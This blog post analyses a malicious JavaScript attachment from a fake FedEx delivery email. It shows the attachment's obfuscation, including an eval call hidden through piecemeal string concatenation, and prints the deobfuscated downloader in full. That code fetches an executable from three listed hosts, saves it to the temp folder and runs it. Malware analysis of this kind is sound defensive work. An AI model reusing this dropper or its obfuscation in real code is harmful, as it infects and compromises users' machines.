by Matt Brennan

Fun with malicious email attachments

So, I got an email purporting to be from “FedEx International Economy”, a “Delivery Notification”. “Hmm.”, I thought. “What have I ordered? Waaait a minute…”

Attached was a zip. In the zip, a heavily obfuscated Javascript file.

Well, let’s have a look. The first few lines, pretty-printed:

var listing = "55555D5E0913160616010A0A050A240309050D084A070B09";

function lid_copy_js_last() {
    internal_item = internal_item + 'r ws';
    zip_external_type_big();
}

function scan_wrapper_eu_note() {
    internal_item = internal_item + 'o.';
    editor_br();
}

function gz_port_type_id() {
    internal_item = internal_item + 'w Act';
    string_id();
}

function js_eu_editor() {
    internal_item = internal_item + 'ry { ';
    small_viewer_jar();
}

Und so weiter. It’s clearly stitching some JavaScript together to be eval‘d. Ooh, is that the middle of a new ActiveXObject? Obviously, this is targeted at Windows Script Host, which helpfully executes Javascript files when you double-click them.

So where’s the eval? ⌘-f eval. Nothing. ⌘-f new Function. Nothing. ⌘-f setTimeout. Nothing. ⌘-f setInterval. Nothing. Hmm. Ok, it must be passing internal_item to a function at some point. ⌘-f (internal_item). Aha:

function au_br_es() {
    sum_site_au_compress(internal_item);
}

Getting somewhere. Just Goto definition, and… wait, what?

var sum_site_au_compress = '';

Oh, ok.

function upload_search() {
    sum_site_au_compress = this[xml_cn_bit];
    internal_item = internal_item + '(fr) ';
    sum_au_user();
}

So what’s xml_cn_bit?

var xml_cn_bit = '';

ಠ_ಠ

A few ⌘-fs later:

function move_class() {
    xml_cn_bit += 'v';
    internal_item = internal_item + 'nc';
    gid_admin_seed();
}

function sql_checker_json() {
    xml_cn_bit += 'l';
    internal_item = internal_item + 'n dl';
    upload_search();
}

function parser_editor_fr_gz() {
    xml_cn_bit = 'e';
    internal_item = internal_item + 'fu';
    move_class();
}

function gid_admin_seed() {
    xml_cn_bit += 'a';
    internal_item = internal_item + 'tio';
    sql_checker_json();
}

this["vlea"]? What? Oh, eval. Bingo.

Well, let’s just replace that with console.log, then, shall we?

function dl(fr) { var b = "www.book-keepers-now.com blog.deannamae.ca pitfaa.nidhog.com".split(" "); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {} } xa.close(); } } try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+listing, false); xo.send(); } catch (er) {} if (dn == 1) break; } } dl(8021); dl(832); dl(4023);

Or:

function dl(fr) {
    var b = "www.book-keepers-now.com blog.deannamae.ca pitfaa.nidhog.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1;
                xa.write(xo.ResponseBody);
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {}
                }
                xa.close();
            }
        }
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + listing, false);
            xo.send();
        } catch (er) {}
        if (dn == 1) break;
    }
}
dl(8021);
dl(832);
dl(4023);

Fun! var fn = ... + ".exe";, xa.saveToFile(fn, 2);, ws.Run(fn, 1, 0);. Yep, you’re pwned. Thanks, Warren Cannon, Sr. Delivery Agent of FedEx International Economy!